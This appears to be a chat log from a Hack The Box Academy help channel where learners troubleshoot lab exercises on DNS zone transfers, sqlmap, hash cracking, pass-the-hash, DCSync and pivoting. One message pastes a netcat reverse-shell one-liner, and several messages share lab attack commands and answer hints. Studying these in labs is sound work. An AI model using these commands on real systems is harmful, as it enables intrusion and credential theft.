#modules
what error
the communications error
time out?
yes
module: SQL Essentials, Case5. I ran the following command but the flag was empty. Did I miss something?
that port on that IP is closed or that IP is not even turned on
was I right in my assumption that it's the DNS server I'm communicating with trying to communicate with another DNS?
no
@undone narwhal any hints or solutions
the dns server here is the machine spawned in the exercise
so who is trying to connect to that third ip?
So does that mean we 'drag and drop' the file into the command line that the RDP session is running in? Because I did, and I am not seeing the file on the target machine.
The target server is the authoritative name server of the domain
you can check it with an nmap scan over port 53
└─$ dig afxr inlanefreight.htb @10.129.42.195
;; communications error to 10.200.60.101#53: timed out
you have that ip in the hosts file
oh
i feel stupid, thank you
Always delete all unnecessary entries from the hosts file.
don't feel@
I'm spinning the box wait
we have all been there
wait, i got that in the parrot instance
how
just let me try my hosts file, I'll look again
@undone narwhal thx
copy and paste the .exe
not the path
yeah not the issue:
my hosts file:
#Custom
10.90.60.80 foophoneels.com
10.129.142.95 unika.htb
10.129.121.206 s3.thetoppers.htb thetoppers.htb
10.129.168.221 ignition.htb
10.129.95.184 base.htb
i dont see inlanefreight.htb
right, but then it wouldn't be directed to that third IP either
and I got that within the parrot instance
as well
the dns server is the ip spawned
ok
I know that
point inlanefreight.htb to that ip in the hosts file
then you will be able to do a zone transfer
that is a weird behavior that shouldn’t be happening
This is not necessary. You only need to specify the IP as the server.
I clicked on the mouse button and selected copy and then paste and it still copied the path. I tried cut and paste and it still copied the path
it works perfect
but i think you are supposed to paste it on the rdp screen
yeah it is working, it was the hosts file
You only need the entry in the hosts file if you specify a domain instead of the IP. But then your system must resolve the IP first. So additional DNS requests are necessary.
I'm confused about the error, but the solution is correct
inlanefreight.htb is a domain
yeah, I still dont understand where the third ip came from
for me it wasnt resolving
Oh okay that worked
probably something related with cache
since it seems an IP from the exercises
Yeah, but not for the NameServer
This is the Standard Hosts File from the PwnBox
Hello guys, I am confused about the Nessus Skills Assessment.
I primarily used my own VM to SSH with the htb-student credentials; after login, I checked the Nessus service but it returned this: Unit nessusd.service could not be found.
Any clarification about this: "Navigate to the web interface at the end of this section and log in with the provided credentials."
well I appreciate it!
it takes some time to spawn
you can get into the nessus dashboard through https in your browser
port 8834 (?)
Then you have done something wrong 🤷♂️
Hi, can anyone help me ?
The screenshot above was just taken now.
idk how they set it up
but from my VM it wasn't working
which is weird
ive never used pwnbox tho
Which module do you need help with?
It is not about an Academy module? Then read and follow #welcome to find the right channel
This actually has nothing to do with the VM.
With the parameter @IP you tell dig that it should query nameserver X.
what more can i say here xD
Please, using the VM or the PwnBox, I don't understand very well
i just told you what happened to me
if VM, you need a VPN connection first
apart from that is the same
@undone narwhal are u still trying?
I am doing a diploma in computer science, 1st year. I want to become an ethical hacker by studying in parallel with the diploma. Can anyone help me with how I can become one?
What I find interesting is that if you specify an IP address, the hosts file is never queried.
i dont know, its ok
I will confirm that is what happened to me as well, I'm confused by it
yes, me too
Let me fix ya name
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
The hosts file is consulted whenever the computer needs to resolve a domain.
But if you specify an IP address, then it does not have to be resolved. So there is no lookup in the hosts file.
that's what I was thinking, the domain is just the query in this case, not the destination
thats why im thinking it was some conflict
from somewhere it was calling to that 10.200 ip
section? and module is SQLMap essentials
I think it has to be something like that, some bug in the terminal parsing perhaps
module: SQLMap Essentials, section: Attack Tuning, exercise Case5.
ignore some of my headers, I copy-pasted the request from Edge
I see, you use the '*' after the 1.
sqlmap should detect it automagically but yeah
i like to add it if i know where is the injection point
for the flag string, i think the risk option is the key here
but i also used level=5
its a kitty
and the prompt is powerlevel10k
alright, before I was able to finish, the error returned and I can't get it to go away. I've spawned two instances of the DNS server and also tried just working from the PwnBox. I'm not really sure what's wrong, but I do know for certain now that this isn't a complete response.
┌─[us-academy-3]─[10.10.14.113]─[htb-ac-187154@htb-yqg1e9isbd]─[~]
└──╼ [★]$ dig afxr inlanefreight.htb @10.129.13.128
; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> afxr inlanefreight.htb @10.129.13.128
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 794
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;afxr. IN A
;; AUTHORITY SECTION:
. 86400 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2023102200 1800 900 604800 86400
;; Query time: 6 msec
;; SERVER: 1.1.1.1#53(1.1.1.1) (UDP)
;; WHEN: Sun Oct 22 15:42:03 BST 2023
;; MSG SIZE rcvd: 108
;; communications error to 10.129.13.128#53: timed out
;; communications error to 10.129.13.128#53: timed out
;; communications error to 10.129.13.128#53: timed out
;; no servers could be reached
guys i need a roadmap for bug bounty for web
That is strange.
Restart the Target and try it again
Otherwise contact the support. Then they have to take a look at it.
yeah I think I need to contact support, I've restarted it a few times
I have sent you printscreens via DM of how it should actually look.
I've had it work intermittently
I posted in community help... is there a better avenue?
Yes, contact the Support (green bubble)
Support usually does not read here
Need some help? Learn how to reach the support team on Academy.
hey guys
is anyone able to help under the footprinting IPMI module?
accounts cleartext password
i cannot crack this hash at all
oh?
use the common wordlist
oh in metasploit?
brute force is for HP IPMIs
no in hashcat
i wasnt bruteforcing it
im using a seclists wordlist
but it doesnt match
im wondering if its my hashcat query
|| hashcat -m150 -a 0 hash.txt passwordlist.txt ||
thats what im using
its crackable with rockyou
ive used all of them
Has anyone completed Zipping??
not the correct chat
I am stuck at uploading part
K
you legend
yeah under seclists
seclists didn't have rockyou.txt, it was only like 20-25-30 etc
thanks a bunch dude!
Sir ! Then where to ask ? 😅
.
@prime stirrup have you seen this? https://askubuntu.com/questions/1168787/libreadline-so-6-issue-in-ubuntu-18-04
which module is this? I'll see if I can do it on a PwnBox
DACL ATTACKS I
oh nevermind thats T3 rip
first locate the library with find
check if exists on the system
if it exists, it is a PATH problem
yep, it exists in /usr/lib/x86_64-linux-gnu/libreadline.so.6
try ldconfig
tried that earlier, didn't help
ah, it return empty
yea
export it with the desired path
and I'm reading that this library is no longer prepackaged in any Linux
the pth-net has to be kind of old
idontknow
so doing that path thing fixed it for that specific lib, but now new one:
./pth-net
bin/net: error while loading shared libraries: libnetapi.so.0: cannot open shared object file: No such file or directory
yeah, pth-net is like 9 years old but reliable way to pass the hash with net rpc etc.
I also can't find an alternate way to pass the hash to add a user to a group
There are some other tools like crackmap iirc and impacket that allow pth
what module is this even?
thanks! missed that
haven't done it, but I'd just try a different tool like Marcie said
me 2
problem is, I am unable to execute command or get shell using cme and many impacket tools
even trying with mimikatz to spawn shell with this user fails
a tool that can use a hash to add a user to a group is bloodyAD for example
oh haven't checked it out, thanks
it's a great tool, though sounds like not used or mentioned in the module
amazing, it worked flawlessly @hallow kiln. Thank you so much!
Hello everyone. So I decided to continue with https://academy.hackthebox.com/module/77/section/859. I did the enumeration, found the login and password for admin, then used msfconsole and chose the right exploit: unix/webapp/get_simple_cms_upload_exec. I set password, rhosts, username, lhost and when I run exploit I just get
[-] 10.129.172.75:80 - Exploit aborted due to failure: no-access: 10.129.172.75:80 - Authentication failed
any idea why?
btw. TARGETURI was already set, i suppose that it's correct
you're welcome, glad you got it
can anyone nudge me in the right direction to find the answer to this question: "Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio."
i am in as root on the linux01
have gone to tmp dir
well, I've moved a bit forward, seems like the targeturi was indeed wrong :D, sometimes asking helps even when you don't get the answer
and? what's the problem
sorry man, I had to go out. Anyway, so yeah, I just tried it and it worked. I'll recommend the HTB PwnBox, otherwise you will face some DNS issues
importing ticket a
there's two tickets for julio, one of them is expired
tbh I don't know how you'd add someone to a group with impacket, never done it
Can anyone help me? I'm doing the VULNERABILITY ASSESSMENT module. I have to do a Nessus scan, but I don't want to wait for it to finish. The module says that there is a file with all the data needed, but I can't find it anywhere.
it tells you which address you need to visit in the browser
ldap_shell.py
ah ok, definitely haven't used it
Checkout dacledit.py
that I've used at some point, still prefer bloodyAD
does anyone know if the module with the GetSimple CMS web has the "upload files and / or images.." broken? I've been trying for like 30 mins, but no popup or anything for file upload appears
ooo
nice nice
there is the diference
gonna try it out
I need to check out bloodyAD it seems
Hi all, I need a steer please on 'Web Attacks - Chaining IDOR Vulnerabilities' - I've hit a brick wall trying to script something to enumerate users, and when I use the web_admin uuid etc to get the flag, I can't get that either, so if some kind soul would kindly point me in the right direction I'd be very grateful. Thanks in advance!
have you found the admin account
very good help menu and intuitive syntax, worth a look
any1 able to help?
in the nessus dashboard there are the scan reports
just use your eyes
they are in front of you after login in
login to what tho?
I told you, it tells you which address to visit in the browser
sorry couldn't tell if you were talking to me
i mean for you to do custom scan you have to also log in
it’s everything done through the web app
its not a cli tool
I think it's used by people who aren't knowledgeable
they like GUI stuff
yeah, I get that Nessus is through a GUI, but I just didn't get where to browse to, makes sense now
thanks
btw what other tool would you recommend? Is Nessus not professional?
I find nessus to be useless, probably good if you've got a license, but none of us do
Thank you!
btw, I will reply to myself again, maybe someone is gonna read it and will help :D. So I could not upload the files because it uses old, unsupported Flash. So I just edited some PHP file in the theme and uploaded my script :). It works.
Hi, thanks for replying! I've been using the details in the lesson, but as I haven't cracked the enumeration script that could be the issue as the admin details in the lesson don't get me anywhere.
I think the session tells you how to enumerate the api for user info
Think about how you completed the previous section
can I get some help please? I started the macOS Fundamentals, got this question: Where are the Applications related to the system stored at? I have tried /Applications, Applications, different variations but it won't accept it.
OK, thanks for your time. I'll revisit - I must have missed something obvious. Cheers
but this one isnt from impacket
any other options?
it's a custom fork
nothing will ever replace a pentest
you need manual job done
for vulnerability assessment nessus is the king
ok clear.
but is good to know
the software
in your professional career there are high chances for you to use it
Yep, I'd say the same, manual enumeration
But if you're at a company doing vulnerability assessments, you'd be using the professional version of Nessus, though you still gotta triage the results after
this one
ippsec used to add user to a group
thanks @worthy vigil for telling
i forgot about it completely
Yeah, I've used it at some point, I just don't like it 😁
happens
fakk want to finish pivoting module asap
want that AD fun
but for today is enough
Can I get some quick check on Web Fuzzing Skills assessment? 2nd question, "What are the different extensions accepted by the domains?", can someone just confirm me how many I should have? I think I have the right answer, just want to check if I missed something or just not inputting them right
there are 3 extensions
hum, need to filter something out then. Thank you!
no worries
the thick client stuff is so hard 
impacket is unreal
learning raw ldap queries and ldapmodify is rad too
Hello guys I am pretty new to hackthebox,
I am currently on the last steps of the "Keeper" machine. I have extracted the ppk file and I created an id_rsa from it.
I am trying to do an ssh connection as root with the id_rsa and it keeps asking for a password.
I have also changed the privileges of the id_rsa (chmod 600 id_rsa) and it keeps asking for password.
Anybody has an idea?
Not the channel for this, read and follow #welcome
Hi everyone, I need help with this question "Enable the http-log output in suricata.yaml and run Suricata against /home/htb-student/pcaps/suspicious.pcap. Enter the requested PHP page as your answer. Answer format: _.php" in Module Working with IDS/IPS. I did find the .php link but I am getting wrong answer message. Maybe I am using the wrong .php link. Can someone give me a little hint please. Thanks
Actually you only have to do what it says
Step 1
Enable http-log output in suricata.yaml
Step 2
Run Suricata against /home/htb-student/pcaps/suspicious.pcap.
Step 3
Read out the logfile
Module: AD Enumeration and Attacks
Section: ACL Abuse Tactics
I run this command given in the module: Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
I get the response: Unable to find user 'damundsen'
Did anyone else run into this problem?
The user would have to exist. Try to restart the lab
I did. I tried to check all log files there’s only one .php in that which is giving me an error:(
the expected answer is <name>.php no forward slashes and not the full URL/URI
Answer format: _.php
I restarted the lab and ran into the same issue. Here's the string of commands I've been running. Does anything look off?
Oh ok. Lemme try again if it works
The password in the $SecPassword variable is incorrect
Yep, I see that now. I was using the one for forend, not wley. Thanks!
why unreal
unreal = really awesome good thing
Module: SQLMap Essentials, section: Bypassing Web Application Protections, case#8. I tried the following two commands, but they didn't work. Why? POST /case8.php
i have the same command but id=1*
which of the two commands?
also the order should be --dump -D testdb -T flag8
any
I think I did that same mistake before. I need to remember to add the '*'.
this worked for me
Would it be easier to put those request headers in a file and use the -r parameter instead?!
Hi I am in AD Assessment part 2, I have gotten SYSTEM on SQL01. I don't know how to start on MS01.
When I dump LSA hashes on SQL01 I got Administrator and its NT hashes which I could use to evil-winrm to SQL01. I have always wondered these are local administrator and not the AD administrator account right? It is not possible to reuse this NT hash to pth to other machines?
I'm getting the annoying "Warning: Potential security risk ahead" message when using burpsuite even though I've already added the burpsuite certificate. It happened when initially going to the web interface for the target machine too, so I'm wondering if it's a HTB issue rather than burp issue at this point.
I guess in this case not a HTB issue, but rather a need for a certificate from HTB.
Not HTB issue
Okay, never had this issue when I was running kali from a live usb. Now that I'm running in a VM this seems to be an issue. Are there any resources on how to remedy this?
Do I need to install a CA certificate from HTB? That's what I had to do with burpsuite.
For the "Shells and Payloads Live Engagement" is there any way to avoid using the foothold machine as the main interface? It is unreasonably slow.
BROKEN AUTHENTICATION
Weak Bruteforce Protections
- I used a short wordlist with the provided python bruting script in the module:
python3 brute0.py /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt
This is the error:
(Please help)
UPDATE:
I tried to include "X-Forwarded-For": "1.2.3.4" Inside of burpsuite and it works but I still cant get a working wordlist for a successful login
Is there any other way to complete the Shells and Payloads section without having to use the supplied RDP machine? It is not functional.
To clarify, it responds, but it takes about 10 seconds to respond.
hi, is it all right not to follow the sequence of the modules in SOC Analyst Job Role path? I want to finish all "easy" modules first.
But no, if u do that, the HTB devs will all crowd ur house with pitchforks
all right, might as well abide to the sequence. thanks a lot
There's a reason for the order, you'll find that some modules use techniques referenced in others that you'd have 0 idea about
anyone here?
Nope
How long does the "Request Help" feature take for paying members?
Hello
Hey goodnight im doing Attacking Common Applications - Skills Assessment I the last question is giving me some trouble can i get a nudge
quick question, I'm doing the Windows Privilege Escalation module, section Citrix Breakout, it's asking me to go to "\\10.13.38.95\share". I'm trying to connect to it, used my own VM's IP but still nothing?
Did you set it up as in the example/section?
Yeah, I set up a SMB server on the host machine, cant seem to get it to work for some reason
if I try connecting to my VM's IP or the IP they gave me I just get this error every time
How does the request help feature work for paying members?
It's been almost two hours now and no assistance.
Considering its late night you're probably just gonna have to wait
Hi, I'm currently doing the Password Attacks module doing the Lab - Hard Section. I can't seem to brute force ||johanna's|| password. I have seen people suggesting to use ||crackmapexec||, which I was already using. I let this thing run for hours today and never got a password. I'm using the mutated password list from earlier in the module, which I've used throughout the module without a problem, so I don't think that's the issue. Here's the command I've been using: || crackmapexec rdp 10.129.16.84 -u johanna -p /home/kali/Documents/htb/passwordAttacks/password_mut.list || I've also tried using the same command with ||smb instead of rdp.|| If anyone has any suggestions, please let me know because I'm not sure what I'm doing wrong.
... because 10.13.38.95 isn't the ip address it's hosted on
It'll be YOUR vm's ip
10.10.x.x
I can see ya help request. You gotta be patient
And is still the weekend for most as well
You also probably could have just asked your question here and got a faster response just sayin
^
I'm not saying the help feature is useless, especially if you're 99% sure you did it right and the lab env is just borked
Which happens
The answer to the question they have is completely incorrect and is something the community can happily answer
Give me a minute to check my notes I'm 99% sure I did smb first but could be wrong one min
If I could I'd be soooo tempted to attempt cpts on a tethered network connection
Appreciate it
I’m going for CDSA and maybe CBBH
The foothold box on the Shells and Payload Live Engagement is not functioning. I can interact with it, but everything lags by at least 10 seconds.
Was hoping for a viable alternative.
Set up a proxy via ssh port forwarding
I don't see that option
There is no real "alternative" mostly because the targets are on a shared internal network with the jump host
That's fair considering pivoting isn't discussed until a later module
But also consider: is your network stable, are you using udp or tcp for your vpn
Are you running on dial-up
Need to reup my notes but it looks like I was able to get smb perhaps you're missing a flag like -local-auth or something
My network is doing fine. I'm using the VPN file provided by HTB. The problem is the foothold box, it's just comically slow.
I refer to the udp vs tcp download, tcp is just more stable
I'll try again tomorrow and see if I get some support by then. Thanks!
I'll give that a try thanks
I used my own vm IP too, same issue
so for attacking common applications skill assessment 1 i was able to use the cgi to navigate to the flag but im not able to read the flag... what am i missing?
Looks like you're running a dir command. Replace that with type and add flag.txt to the end of your query
@fathom pendant I figured it out, was using it on the wrong vm.. -_-
Happens
Completely forgot Im using a VM inside a VM >.>
@fathom pendant the command runs because i get a 200 request , but unfortunately the page is blank i checked the source as well . I tried with type/more
Bruh why?
it wouldnt be an option you 'see' itd be something you setup
Using online box, my own vm has internet issues
Hey guys, how you doing? Might givin me small hint about
https://academy.hackthebox.com/module/77/section/859
I got the first task, I run the LinEnum.sh script too
but I cannot find any .sh file I could upload my
'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.140 8443 >/tmp/f'|tee -a file.sh
I tried to convert it to php and uploaded in theme .php but it didn't work 😦
@fathom pendant am I entering the command wrong or am I cursed?
without sudo I get permission denied
smbserver.py is probably not in root's PATH
^
so you run without permissions and it doesnt have proper perms to run, and with perms it cant find it
need to install globally or provide the full path
I'm using the box they give you though
so?
locate smbserver.py
sometimes you gotta grease your tools a little to get em to work
^
I had a tool recently I couldnt get its pathing sorted out so Ive resorted to sudo $(which tool) --args
lmao
lmao, I located smbclient.py, copied it to my current directory and it still says it cant find it wtf
im not sure why pwnbox even messes with the default impacket paths
actually nvm I'm going insane, I have the .py file in the same directory
./
thank you, it works. my sanity is saved.
on a normal kali vm youd just install impacket and use sudo impacket-smbserver
pwnbox gotta be weird about it though
This ain't even pwnbox its a jump host
Yeah, I'm kinda not used to having to manually sort the command out, I'm too use to just having the short cut available.
oh weird
anyways thanks Lee and Mad ^^
Hey can anyone help me with Linux fundamentals module's containerization section
I'm not able to work my way around the lxc commands
The commands given seem to not work the way they have been described
can someone help me with logrotate privilege escalation
idk how to trigger the logrotation
its just a copy paste from browser devtools.
copying in a file is an extra step
you solved?
Watch the video “book” from ippsec
Hi I am in AD assessment 2 any nudge for getting into MS01 (question 8)? I have system on SQL01.
check the "hives" and use crackmapexec to see where you have a hit
There will be a more advanced path/cert than the CBBH in a more or less far future, no?
since i saw some more "advanced" modules but the price isnt cheap at all
Hello everyone! Facing troubles with network connection - it always disconnects. Module Password Attacks Section:Pass the ticket from linux. Does anyone having same troubles?
ping 10.129.240.165
PING 10.129.240.165 (10.129.240.165) 56(84) bytes of data.
^C
--- 10.129.240.165 ping statistics ---
41 packets transmitted, 0 received, 100% packet loss, time 41027ms
Downloaded a new TCP VPN file and now it doesn't disconnect anymore - but still can't RDP
The machine may not be reachable via ping.
it is
ping -c 1 10.129.199.218
PING 10.129.199.218 (10.129.199.218) 56(84) bytes of data.
64 bytes from 10.129.199.218: icmp_seq=1 ttl=127 time=37.2 ms
--- 10.129.199.218 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 37.200/37.200/37.200/0.000 ms
rdp: now logon failure - suddenly login doesnt work anymore
my bad - had wrong pass 😦
Do I have to SSH into the target machine initially for the section of this module? I tried the username and password in the hint and it failed.
Create your own wordlist, with the term you found in the hint
The hint is meant to nudge you. The password is in the huge mutated wordlist
Module: Password Attacks, Section: Pass the ticket from linux - Network problems - chisel client from MS01 doesn't connect to chisel server -- really annoying
On attack box: sudo ./chisel-linux server --reverse On MS01:chisel.exe client 10.10.15.38:8080 R:socks
2023/10/23 05:19:52 client: Connecting to ws://10.10.15.38:8080
2023/10/23 05:20:13 client: Connection error: dial tcp 10.10.15.38:8080: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
Try it from the PwnBox.
Yes, but if there are connection problems, then try the PwnBox
having multiple VPNs being connected to academy won't make the connection faster
The problem with PwnBox is the keyboard - dont have an us keyboard - instead swiss german
so cant type there correctly
guys, I'm on an MSSQL server right now and I don't have the permission to run xp_cmdshell, I can only xp_dirtree
how can I download a file in this situation
I also have a Swiss keyboard, but it works. Not super well, but for testing it works.
Try to switch the VPN from EU to US or from US to EU. From TCP to UDP or from UDP to TCP. Experiment a bit with the settings.
As dpgg already said. Disable all other VPN connections.
This about Manager?
in general, like, because in the Attacking Common Services module they didn't mention this
or am missing it
in my notes
idk
The modules don't teach you everything there is to know
@acoustic owl with PwnBox it works
but why not without it
it should work
wasted hours and hours of time trying to make it work
Then it is your connection
As written, try another VPN location, TCP or UDP and disable all other VPN connections.
👀
I have ProtonVPN also running but this shouldn't cause the issue, should it?
@acoustic owl what do you mean by disabling all other VPN connections? I only have one
this can disrupt the connection
Deactivate it and then try again
ok i give it a try
doesnt work either
even with different vpn files
@acoustic owl do you have a preferred VPN file?
I usually take US and TCP.
@acoustic owl it just won't work, independent of which VPN file I use -- aannooyyiinngg
But it is obviously due to your connection. It works with the PwnBox.
Based on your statement that you are using a CH keyboard, I assume that you are coming from there.
No idea what provider you use, or what software you use that could limit your internet traffic. But if you don't live in a mountain village, you should have a stable internet connection and no problems.
Guessing my VPN connection is quite good! Don't live in the mountains :). Don't think that's the issue. Assuming it has to do with the box setup
@acoustic owl Maybe you can give it a try? Would really appreciate it
reach out to support via the website
As soon as I am at home I can test it
Probably a select file into outfile type of scenario @orchid pine iirc attacking common services does refer to this
like i found it
select into outfile isn't for writing
@acoustic owl thx
Stuck on this room
https://academy.hackthebox.com/module/112/section/1069
- 1 What is the FQDN of the host where the last octet ends with "x.x.x.203"?
Getting ns record query failed: NXDOMAIN
when trying to enumerate DNS servers
Subdomains of subdomain
Find all Zones
^ ns query isn't really gonna be too helpful for this
oh k nice idea
was only looking at first level subdomains
If the answer isn't in the first level...
if you don't have it and you can't enable it, the path is different. With xp_dirtree and/or xp_subdirs you can try to steal the NTLMv2 challenge and crack it offline
also relay attack is possible with authentication challenges
there's more you can do but it concerns an active box
it's manager, newest windows AD box, you should check it out
if its an active box just try harder 🙂
i would, but too focused on modules
want to finish and start with prolabs
hey guys
I took a break from the modules to do Zephyr, I recommend it
can somebody give me an example of: In a first step, the SSH server and client authenticate themselves to each other. The server sends a certificate to the client to verify that it is the correct server. Only when contact is first established is there a risk of a third party interposing itself between the two participants and thus intercepting the connection. Since the certificate itself is also encrypted, it cannot be imitated. Once the client knows the correct certificate, no one else can pretend to make contact via the corresponding server.
what would an attack like that look like?
; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> axfr dev.inlanefreight.htb @10.129.177.237
;; global options: +cmd
; Transfer failed.
any idea why this is happening
😋 im jealous
what attack? this is just an explanation of how authentication works
"Only when contact is first established is there a risk of a third party interposing itself between the two participants and thus intercepting the connection. "
i want to see what that would look like
#1165345722531590284 man crazy that there's a channel for a new box
many reasons…
man-in-the-middle attack
mitm ig
thank you! 🙂
one of them, transfer zone not enabled for your ip
or not enabled at all
or not a zone
Could be that you can't transfer to that subdomain but iirc you have to use the brute force tool
axfr risk is that you get the whole network scheme with 1 command xd
btw is there a way to copy stuff into the attackbox
since i can only copy out of it but not into it
@quasi jungle are you using virtualbox or webclient box?
webclient box
figured it out had to reset target and it worked
I would copy paste the content of a file and then paste it in the box
I can't paste into the attackbox it just doesn't render there
You need to enable clipboard sharing iirc there's also a clipboard button
clipbox down right
Sir, respectfully, that's the right
Right you are 😏
Actually I'm center-left
Yea worked didn't even notice the button
I prefer using my own vm but hey to each their own
Is there anyone here with a vacant spot on their team for me to join in the upcoming Capture The Flag (CTF) competitions? I have prior experience participating in picoCTF and am now looking to challenge myself by participating in the HTBCTF.
thanks in advance
This is completely unrelated to this channel read #welcome to see how to gain access to more of the server
oh
sorry about that ..
I'm currently reviewing my notes, and I have a question regarding "AD Enumeration & Attacks - Skills Assessment Part I" Q2. I found the answer to the question. I ran BloodHound and found several Kerberoastable accounts, but my question is: How do we know that this particular account is the one that should be targeted and will lead to further escalation until reaching the DC? BloodHound doesn't show anything useful, just a list of kerberoastable accounts.
It looks like a service account, those are commonly misconfigured with elevated permissions
But also, unless you have a reason to not want to generate too many alerts, kerberoast everything 😁
ok makes sense
help python module hijacking
the sticky bit is not working
oh crap i just realised its not SUID bit
Hi All
Could you please help me?
I'm doing the Privileged Access in AD module and I'm trying to connect from Win to ssh because I need to use mssqlclient
I don't know how can I connect to this damundsen user with SQL1234! password
when I'm trying to connect via ssh there is no connection to the 172.16.5.150 address
You need to first spawn the target machine, you're never gonna get to 172 because it's on a different network
yeah I'm connected to the target via rdp
and on this target I'm trying to connect via ssh to damundsen
with 172.16.5.150 IP
This image you provided doesn't support that you're rdp into that target machine
Show above where it will either have "spawn target" or the ip
Sure
ok one moment because in this module there are some issues with connection 😉
Try using a different vpn server and the tcp download
So I thought that from there I can connect to 172.16.5.15 via ssh
but it's not working
One time you say .15 other you say .150, which is it
I saw that there is option to connect to 172.16.5.225 htb-student:HTB_@cademy_stdnt! but it also not working
.150 sry
When you type ipconfig, is the system on a 172.16.5 network
So why would you try to ssh, to your own machine, in this instance
Secondly what does the command look like when you're trying to ssh to (what I'm assuming is DC) as damundsen
Idk
Is the ssh on that port, or does the module indicate a different port
not sure how can i check that
The question might tell you
I don't know :/
I haven't done this module so I can't tell you what you're doing wrong tbh
I'm like trying to do this connection 4 hours and still don't know how can I do it XD
hello guys my question is i have a ticket for admin loaded in klist
but i cannot access the admin dir
plzzz
Need more context, what module are you doing, what section, are you sure the ticket is valid
yeah
Module: PIVOTING, TUNNELING, AND PORT FORWARDING
Section: Skills Assessment
Question: In previous pentests against Inlanefreight, we have seen that they have a bad habit of utilizing accounts with services in a way that exposes the users credentials and the network as a whole. What user is vulnerable?
Ive been attempting to transfer files to/from || 172.16.5.35 || to my attack host but I haven't been successful. Can someone help shed some light on what Im doing wrong? Ive tried a number of methods that should have otherwise worked (scp, wget, curl, etc) but either files downloaded from || 172.16.5.35 || come back empty or files uploaded from my attack box fail.
Can you ping your attack host from the target? :) that'll answer your question you need to do a bit of bouncing around
I dont see what's not working
I see you got a return for ls /
¯\_(ツ)_/¯
I dont see a file.txt in that root directory?
Yeah lol
You did ls /
Does the output you see have a file.txt?
You mean the one after the #?
2
Now I see
¯\_(ツ)_/¯
Haven't done this module so can't tell you how you're being dumb
Usually the case
I know that if I cancel my student subscription, I lose access to the incomplete modules, but if I buy the student subscription again, the incomplete modules won't be restored, right?
That's probably a better question for support tbh, but I wouldn't think so
As far as I know, you simply don't have access without a subscription. But the progress remains. To be absolutely sure, ask the support
okay thank you, I will ask them then
No you dont lose access to anything 😉
Without a subscription, he only has access to completed or purchased modules.
this is the txt for the flag after the GIF8 
Since it was his question lmao
That was the answer to your statement, which is obviously wrong.
For Command Injections: Advanced Command Obfuscation, I'm attempting to find a way to make $(a="WhOaMi";printf %s "${a,,}") work (not the question, just the exercise), but I'm not able to get it work.
I've attempted to replace the ; as well as the spaces, but nothing outputs with regards to the whoami command. Can anyone assist?
Stuck on the Intro to Assembly Language - Data Movement module. No matter what I try, I keep getting a wrong answer
"Add an instruction at the end of the attached code to move the value in "rsp" to "rax". What is the hex value of "rax" at the end of program execution? "
Any hints on this question? Please
By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer.
from
Windows Event Logs & Finding Evil Mini-Module
skill assessment
pic of code ur using
press b
I figured it out lol was doing mov rax, rsp which was wrong.
Yeah it worked now. Thanks
; is filtered right so don't use it
Already mentioned that I replaced ;.
replaced with what?
${LS_COLORS:10:1}
how about you dont use it at all?
?
hint: ||new-line||
Awesome, that worked. Thanks!
So there is no way to use a direct replacement for ;? I have to use another operator?
There could be, but thats how i did it
cool thanks.
In the questions section
It says
Vhosts needed for these questions:
App.inlanefreight.local
Dev.inlanefreight.local
And I'm not sure what to do😬
add those to /etc/hosts pointing to the IP , example
10.10.125.101 Dev.inlanefreight.local App.inlanefreight.local
Thanks man🤝
complete noob here.....
anyone know of ways to practice parrot, ssh, reverse shells, and nmap.
i don't want to look on the web to practice, but i feel like i need to practice a bit before moving further. (outside reading man and help.)
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
that's what academy is for, if you're a noob, go there and start learning
i have completed several of the beginning courses on a different source before finding HTB. was able to accomplish all tasks, find all the answers to any questions. but when it's over i know what i did, but only the exact instance. are there any recommendations for ways to practice with nmap and ssh. i feel like i need a few more practice examples to get concepts honed.
when you struggle but pass one lesson, and want more practice before moving to next step, are there places or ways you can run the simulations....for example, is it allowed to run countless nmap tests on various public domains? or do certain tests become too aggressive.
Totally More Hack the Box!
you can't just run scans against public domains without permission, that's illegal territory, just do some boxes if you don't want to do modules
Sorry for the late reply but there are a few ways you can do this, you can change the pass file that is being used by metasploit, you can also utilize nmap and do an ipmi-* for the script, which takes a while
Hi,
I'm working on the password cracking htbacademy module, and have enumerated that there is a share called 'CASSIE'
hydra -l cassie -P password.list 10.129.202.136 smb
I have tried all variants of cassie but it doesn't seem to work, any tips?
anyone have an idea what could be happening here, when I ran this command
secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5
I'm getting this error message at the end of the command execution
inlanefreight.local\yousbaged58:1715:aad3b435b51404eeaad3b435b51404ee:8025d12232e66c0bf0c4dd76baed7f6d:::
[-] [Errno 104] Connection reset by peer
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...ls
10-4 thanks
I'm running command by command as is described in the module DCsync from AD Enum & Attack just replicating...
what is kira's id_rsa password trying to use mutated wordlist but get
john --wordlist=~/Desktop/mut_password.list ~/id_rsa
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
when i go to open id_rsa it asks for password and kira's password doesn't work
is id_rsa a hash?
Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'
